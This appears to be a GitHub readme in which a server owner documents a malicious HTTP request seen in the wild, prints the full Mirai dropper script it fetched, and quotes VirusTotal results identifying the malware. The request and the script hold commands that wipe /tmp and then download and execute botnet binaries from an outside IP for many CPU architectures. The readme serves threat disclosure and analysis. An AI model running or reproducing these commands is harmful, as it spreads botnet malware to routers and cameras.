jaws.exploit

What ?

So, once upon a time, my server was visited by 91.92.244.94, which sent this HTTP request.

GET /shell?cd+/tmp;rm+-rf+*;wget+193.233.203.76/jaws;sh+/tmp/jaws HTTP/1.1

Remove everything from /tmp folder, download 193.233.203.76/jaws, then execute it.

Here is the content of the jaws file.

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; cat db0fa4b8db0333367e9bda3ab68b8042.arm > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; cat db0fa4b8db0333367e9bda3ab68b8042.spc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; cat db0fa4b8db0333367e9bda3ab68b8042.arc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit

Change the current directory, download some files (each one for each CPU architecture), set its executable flag, then execute it by using "jaws.exploit" parameter.

For archival purposes, I already downloaded all those executables here.

So?

I wish some security researchers could find out what these executables actually do.

Epilogue

Virus total http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86 URL check : MIRAI
- "This IPV4 is used by MIRAI. Mirai is a malware that created a big botnet of networked devices running Linux making them remotely controlled bots that can be used for large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers."
Virus total db0fa4b8db0333367e9bda3ab68b8042.x86 executable file sha256 sum hash check : trojan.mirai/gafgyt

altilunium / jaws.exploit

readme

jaws.exploit

What ?

So?

Epilogue